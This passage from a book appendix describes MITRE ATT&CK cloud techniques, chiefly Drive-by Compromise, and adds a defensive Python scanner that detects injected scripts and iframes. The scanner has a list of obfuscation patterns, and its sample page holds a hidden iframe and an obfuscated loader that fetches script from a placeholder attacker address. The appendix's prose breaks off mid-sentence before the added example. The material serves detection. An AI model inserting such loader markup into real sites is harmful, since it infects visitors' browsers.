APPENDIX G: MITRE Cloud Matrix

The tactics and techniques covered in this appendix represent the portion of the MITRE ATT&CK Matrix for Enterprise that covers cloud-based techniques. The Matrix contains information for the following platforms: Azure AD, Office 365, Google Workspace, SaaS, and IaaS. Figure G-1 shows the framework.

Refer to https://attack.mitre.org/matrices/enterprise/cloud/ for the latest information.

Initial Access

Drive-by Compromise

Adversaries may gain access to a system through a user visiting a website in the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring access to an application token (for example, a session or OAuth token held by the browser). Multiple ways of delivering exploit code to a browser exist, including:

  • A legitimate website is compromised and adversaries inject some form of malicious code, such as JavaScript, iframes, or cross-site scripting payloads.
  • Malicious ads are paid for and served through legitimate ad providers (malvertising).
  • Built-in web application interfaces are leveraged to insert any other kind of object that can display web content or carry a script that executes on the visiting client (e.g., forum posts, comments, and other user-controllable web content).

    Figure G-1: MITRE ATT&CK Framework Cloud Matrix (schematic illustration)

Often the website used ...
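The first and third delivery vectors above both leave evidence in the served HTML: an injected loader script or iframe on a compromised page, or user-supplied content that a forum or comment feature rendered without escaping. The following scanner, added here as an example and not part of the original appendix or the MITRE framework, is the kind of check a hunter runs against a snapshot of a site's pages to surface injected content. It flags scripts and frames pulled from hosts outside an allowlist, hidden iframes, and inline scripts that use common obfuscation primitives. The `TRUSTED_HOSTS` set, the heuristic patterns, and the sample page (with the documentation address 203.0.113.7 as the "attacker" host) are all assumptions constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts/frames from (assumption for the example).
TRUSTED_HOSTS = {"cdn.example.com", "www.example.com"}

# Primitives that injected drive-by loaders commonly use to hide a second-stage URL.
# Heuristic only: legitimate code also uses these, so findings are leads, not verdicts.
SUSPICIOUS_JS = re.compile(r"\b(eval|unescape|atob)\s*\(|String\.fromCharCode", re.I)


class InjectScanner(HTMLParser):
    """Walk an HTML document and record indicators of injected drive-by content."""

    def __init__(self):
        super().__init__()
        self.findings = []          # (line, tag, reason)
        self._in_script = False
        self._script_buf = []
        self._script_line = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        line, _ = self.getpos()
        if tag in ("script", "iframe", "embed", "object"):
            src = a.get("src") or a.get("data")
            # Relative URLs have no hostname and are treated as same-origin.
            host = urlparse(src).hostname if src else None
            if host and host not in TRUSTED_HOSTS:
                self.findings.append((line, tag, f"external {tag} from untrusted host {host}"))
        if tag == "iframe":
            style = (a.get("style") or "").replace(" ", "").lower()
            if (a.get("width") in ("0", "0px") or a.get("height") in ("0", "0px")
                    or "display:none" in style or "visibility:hidden" in style):
                self.findings.append((line, tag, "hidden iframe"))
        if tag == "script":
            # HTMLParser delivers <script> bodies through handle_data; buffer until </script>.
            self._in_script = True
            self._script_buf = []
            self._script_line = line

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            body = "".join(self._script_buf)
            if SUSPICIOUS_JS.search(body):
                self.findings.append((self._script_line, "script",
                                      "obfuscation primitive in inline script"))
            self._in_script = False


def scan_html(html):
    """Return a list of (line, tag, reason) findings for one HTML document."""
    parser = InjectScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: a forum page with a trusted script plus an injected hidden
# iframe and an obfuscated inline loader, as a drive-by compromise would leave behind.
SAMPLE_PAGE = """<html><head>
<script src="https://cdn.example.com/app.js"></script>
</head><body>
<h1>Forum</h1>
<div class="post">Hello <b>world</b></div>
<iframe src="http://203.0.113.7/ld.php" width="0" height="0" style="display:none"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://203.0.113.7/x.js%22%3E%3C/script%3E'));</script>
</body></html>"""

if __name__ == "__main__":
    for line, tag, reason in scan_html(SAMPLE_PAGE):
        print(f"line {line}: <{tag}> {reason}")
```

Run against the sample, the scanner reports the untrusted iframe source, the zero-size hidden iframe, and the `unescape(` loader on the inline script; the trusted CDN script produces nothing. In practice you would feed it pages fetched from your own site (or from a proxy cache) and diff findings against a known-good baseline, since the allowlist and obfuscation heuristics will produce noise on sites that legitimately embed third-party ad or analytics code.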
